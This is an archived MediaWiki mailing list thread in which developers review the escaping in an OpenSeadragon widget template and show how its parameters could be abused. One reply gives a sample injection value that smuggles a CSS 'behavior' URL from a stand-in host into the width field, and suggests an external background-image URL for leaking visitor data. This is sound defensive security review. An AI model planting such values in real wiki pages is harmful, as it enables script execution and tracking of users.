[MediaWiki-l] Security of widgets? Way to limit parameters? OpenSeadragon

Brian Wolff bawolff at gmail.com
Sun Oct 30 00:30:23 UTC 2016


On Saturday, October 29, 2016, Daniel Friesen <daniel at nadir-seen-fire.com>
wrote:
> On 2016-10-29 8:40 AM, Brian Wolff wrote:
>> On Sat, Oct 29, 2016 at 2:50 PM, Dr. Michael Bonert
>> <michael at librepathology.org> wrote:
>>> Hello,
>>>
>>> I was wondering about the security of Widgets  (
>>> https://www.mediawiki.org/wiki/Extension:Widgets )  that get parameters
>>> passed to them. Any thoughts?
>>>
>>> Are the parameters passed through to the widget cleansed of
html/scripts?
>>> If it isn't -- is it possible to easily enforce typing/boundaries on the
>>> parameters?
> There is no way to abstractly ensure scripts are cleaned from text. If
> you know exactly where it is going you may be able to escape everything.
> But you cannot target scripting explicitly and expect to clean it up, as
> there are numerous tricks that can be used to bypass anything but the
> strictest of escaping:
> https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
>
>>> Create page: Widget:OpenSeadragon
>>> ---------------------------------------------------------------------
>>> <noinclude>__NOTOC__
>>> <!-- Copyright (c) 2016 Michael Bonert -->
>>> <!-- Released under GNU General Public Licence - Version 3; see
>>> http://www.gnu.org/licenses/gpl.html -->
>>> To insert this widget, use the following code:
>>>
>>> <nowiki>{{#widget:</nowiki>{{PAGENAME}}<nowiki>
>>> |image=12881.dzi
>>> |width=800
>>> |height=600
>>> }}</nowiki>
>>>
>>>
>>> </noinclude>
>>> <includeonly><!-- This inserts an OpenSeadragon image -->
>>> <div id="openseadragon1" style="width:
>>> <!--{$width|default:400|escape:'html'}-->px; height:
>>> <!--{$height|default:300|escape:'html'}-->px;"></div>
>>> <script src="../../openseadragon/openseadragon.min.js"></script>
>>> <script type="text/javascript">
>>>     var viewer = OpenSeadragon({
>>>         id: "openseadragon1",
>>>         prefixUrl: "../../openseadragon/images/",
>>>         tileSources: "../../vslide/<!--{$image|escape:'urlpathinfo'}-->"
>>>     });
>>> </script>
>>> </includeonly>
>>> -------------------------------------------------
>>>
>> In theory that's what the escape modifier is for in smarty parameters.
>>
>> However, in this example, <!--{$width|default:400|escape:'html'}-->px;
>> inside a style attribute isn't really sufficient, as a user could set
>> a width parameter like "400; behavior: url(
>> 'https://foo.com/bar.htc#baz' );x: ", which would cause javascript
>> execution on IE9 and older. (There are other properties for other
>> browsers, however mostly affecting only older browsers). You could
>> also leak private info about your users by doing something like
>> background-image: url( "http://external.com/foo.png" ) .
>>
>> [Disclaimer: I have not read the source code of the widgets extension,
>> so there could also potentially be generic security issues with the
>> extension. Since I haven't reviewed it, I don't really know].
>>
>> --
>> bawolff
> And then there is $image. urlpathinfo doesn't escape quotes,
> backslashes, or </script>.
>
>

Its hard to find docs on what urlpathinfo actually does (talk about a red
flag for a security mechanism...) but i thought it was basically
rawurlencode, which i think escapes all the relavent characters in this
context as percent encoding.

--
Bawolff


More information about the MediaWiki-l mailing list